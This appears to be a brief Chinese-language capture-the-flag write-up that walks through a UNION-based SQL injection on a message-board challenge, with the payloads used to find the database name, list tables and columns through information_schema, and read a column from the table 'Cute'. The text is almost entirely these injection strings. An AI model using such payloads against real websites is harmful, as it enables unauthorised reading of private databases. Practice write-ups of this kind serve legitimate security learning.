先找到闭合，查数据库

0'union select 1,2,3,database(),5'

得到nss_board,接着查表

0'union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema like database()),4,5'

得到Cute,messages，然后查列

0'union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema like database()),4,5'

得到id,Happy,id,username,title,content,created_at，再查字段

0'union select 1,2,(select group_concat(Happy) from Cute),4,5'